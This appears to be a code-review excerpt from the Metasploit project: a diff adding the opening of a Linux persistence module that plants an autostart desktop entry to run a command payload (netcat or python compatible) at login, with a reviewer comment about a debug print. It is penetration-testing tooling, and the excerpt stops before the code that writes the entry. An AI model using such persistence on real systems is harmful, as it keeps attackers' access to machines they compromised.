modules/exploits/linux/local/autostart_persistence.rb

```diff
@@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+    Rank = ExcellentRanking
+    
+    include Msf::Post::File
+    include Msf::Post::Unix
+    include Msf::Exploit::FileDropper
+    
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'Autostart Desktop Item Persistence',
+            'Description'    => %q(
+                This module will create an autostart entry to execute a payload.
+            ),
+            'License'        => MSF_LICENSE,
+            'Author'         => [ 'Eliott Teissonniere' ],
+            'Platform'       => [ 'unix', 'linux' ],
+            'Arch'           => ARCH_CMD,
+            'Payload'        => {
+                'BadChars'   => '#%\n"',
+                'Compat'     => {
+                    'PayloadType'  => 'cmd',
+                    'RequiredCmd'  => 'generic python netcat'
+                }
+            },
+            'SessionTypes'   => [ 'shell', 'meterpreter' ],
+            'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+            'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
+            'Targets'        => [ ['Automatic', {}] ],
+            'DefaultTarget'  => 0
+        ))
+              
+        register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
+    end
+    
+    def exploit
+        name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
+        vprint_status ("Name is #{name}")
+                         
+        vprint_status payload.encoded
```

Comment:
Some context would be nice.

```ruby
vprint_status "Payload: #{payload.encoded}"
```

Alternatively, consider moving this after `print_status('Uploading autostart file')`, and use `vprint_line` :

```ruby
vprint_line payload.encoded.to_s
```

Reply:
It was mostly for debugging, since it doesn't add that much stuff I could even remove it